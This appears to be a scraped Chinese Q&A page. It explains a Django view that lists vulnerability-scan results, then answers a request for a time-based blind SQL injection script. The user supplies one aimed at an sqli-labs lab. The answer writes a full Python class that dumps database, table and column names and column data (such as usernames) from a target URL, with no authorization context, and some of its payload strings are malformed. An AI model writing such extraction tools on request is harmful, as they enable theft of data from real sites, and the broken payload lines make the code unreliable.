def vuln_result(request, target_id): d = Vuln(API_URL, API_KEY) data = [] vuln_details = json.loads(d.search(None,None, "open", target_id=str(target_id))) id = 1 for target in vuln_details['vulnerabilities']: item={ 'id': id, 'severity': target['severity'], 'target': target['affects_url'], 'vuln_id':target['vuln_id'], 'vuln_name': target['vt_name'], 'time': re.sub(r'T|\..*$', " ", target['last_seen']) } id += 1 data.append(item) return render(request,'vuln-reslut.html',{'data': data})
时间: 2023-06-10 19:06:11 浏览: 91
这段代码定义了一个名为 `vuln_result` 的视图函数,它接受一个 `request` 和一个 `target_id` 参数。在函数内部,它使用 `Vuln` 类的实例 `d`,并将其初始化时传入的 `API_URL` 和 `API_KEY` 作为参数。然后,它通过调用 `d.search` 方法来搜索与目标相关的漏洞信息,并将结果存储在 `vuln_details` 变量中。
接下来,通过迭代 `vuln_details['vulnerabilities']` 中的每个漏洞,创建一个字典对象,并将其添加到名为 `data` 的列表中。字典对象包含漏洞的 ID、漏洞等级、受影响的 URL、漏洞 ID、漏洞名称和最近一次发现漏洞的时间。最后,将 `data` 列表传递给模板,以显示漏洞搜索结果。
相关问题
import time import requests def get_data_len(url, data_payload): length = 1 while True: data = f"id=1' and if(LENGTH({data_payload})>{length},sleep(0.4),1)--+" start_time = time.time() response = requests.get(url, params=data) end_time = time.time() if end_time - start_time >= 0.4: length += 1 else: break return length def get_ASCII(url, ascii_payload): ascii_value = '' for i in range(1, len(ascii_payload) + 1): left = 32 right = 126 while left <= right: mid = left + (right - left) // 2 data = f"id=1' and if(ASCII(SUBSTRING({ascii_payload}, {i}, 1))>{mid},sleep(0.4),1)--+" start_time = time.time() response = requests.get(url, params=data) end_time = time.time() if end_time - start_time >= 0.4: left = mid + 1 else: right = mid - 1 ascii_value += chr(left) return ascii_value def get_schema_name(url): len = get_data_len(url, 'database()') print('获取数据库名字') db_name = get_ASCII(url, f'substr(database(),1,{len})') print(db_name) def get_table_name(url): table_name = get_ASCII(url, '(SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema=database())') print(table_name) def get_column_names(url, table_name): column_names = get_ASCII(url, f"(SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name='{table_name}')") print(column_names) def get_column_data(url, table_name, column_name): column_data = get_ASCII(url, f"(SELECT GROUP_CONCAT({column_name}) FROM {table_name})") print(column_data) url = "http://192.168.124.128/sqli-labs-master/Less-9/??id=1/" print('开始') get_schema_name(url) print() get_table_name(url) get_column_names(url,'emails') table_name = 'emails' column_name = 'email_id' get_column_data(url, table_name, column_name)帮我写个类似这样的python时间盲注脚本
好的,以下是一个简单的时间盲注脚本示例:
```python
import requests
import time
class TimeBasedSQLi:
def __init__(self, url, sleep_time=0.5):
self.url = url
self.sleep_time = sleep_time
def make_request(self, payload):
data = {"id": f"1' AND {payload} AND '1'='1"}
start_time = time.time()
response = requests.get(self.url, params=data)
end_time = time.time()
if end_time - start_time >= self.sleep_time:
return True
else:
return False
def get_db_name(self):
length = 1
while True:
payload = f"IF(LENGTH(database())>{length},SLEEP({self.sleep_time}),1)"
if self.make_request(payload):
length += 1
else:
break
db_name = ''
for i in range(1, length):
for j in range(32, 127):
payload = f"IF(ASCII(SUBSTRING(database(), {i}, 1))={j},SLEEP({self.sleep_time}),1)"
if self.make_request(payload):
db_name += chr(j)
break
return db_name
def get_table_names(self):
table_names = ''
payload = f"(SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema='{self.get_db_name()}')"
length = 1
while True:
check_payload = f"IF(LENGTH(({payload}),{length}),SLEEP({self.sleep_time}),1)"
if self.make_request(check_payload):
length += 1
else:
break
for i in range(1, length):
for j in range(32, 127):
check_payload = f"IF(ASCII(SUBSTRING(({payload}),{i},1))={j},SLEEP({self.sleep_time}),1)"
if self.make_request(check_payload):
table_names += chr(j)
break
return table_names.split(',')
def get_column_names(self, table_name):
column_names = ''
payload = f"(SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name='{table_name}')"
length = 1
while True:
check_payload = f"IF(LENGTH(({payload}),{length}),SLEEP({self.sleep_time}),1)"
if self.make_request(check_payload):
length += 1
else:
break
for i in range(1, length):
for j in range(32, 127):
check_payload = f"IF(ASCII(SUBSTRING(({payload}),{i},1))={j},SLEEP({self.sleep_time}),1)"
if self.make_request(check_payload):
column_names += chr(j)
break
return column_names.split(',')
def get_column_data(self, table_name, column_name):
column_data = ''
payload = f"(SELECT GROUP_CONCAT({column_name}) FROM {table_name})"
length = 1
while True:
check_payload = f"IF(LENGTH(({payload}),{length}),SLEEP({self.sleep_time}),1)"
if self.make_request(check_payload):
length += 1
else:
break
for i in range(1, length):
for j in range(32, 127):
check_payload = f"IF(ASCII(SUBSTRING(({payload}),{i},1))={j},SLEEP({self.sleep_time}),1)"
if self.make_request(check_payload):
column_data += chr(j)
break
return column_data.split(',')
# 示例用法
url = "http://example.com/vuln.php"
sqli = TimeBasedSQLi(url)
db_name = sqli.get_db_name()
print(f"Database name: {db_name}")
table_names = sqli.get_table_names()
print(f"Table names: {table_names}")
column_names = sqli.get_column_names('users')
print(f"Column names: {column_names}")
column_data = sqli.get_column_data('users', 'username')
print(f"Column data: {column_data}")
```
注意,这只是一个基本的脚本示例,具体的使用方法和payload需要根据实际情况进行调整。
vuln_details = json.loads(d.search(None,None, "open", target_id=str(target_id)))
这代码看起来是从一个名为"d"的对象中搜索与目标ID匹配的"open"漏洞详情,并将结果解析为JSON格式。具体来说,它使用了Python的json模块中的loads方法,该方法将字符串解析为JSON格式的Python对象。这里的字符串是从"d.search(None,None, "open", target_id=str(target_id))"的返回值中获取的,其中的参数"None"表示未指定搜索条件,而"target_id=str(target_id)"表示指定目标ID作为搜索条件。
阅读全文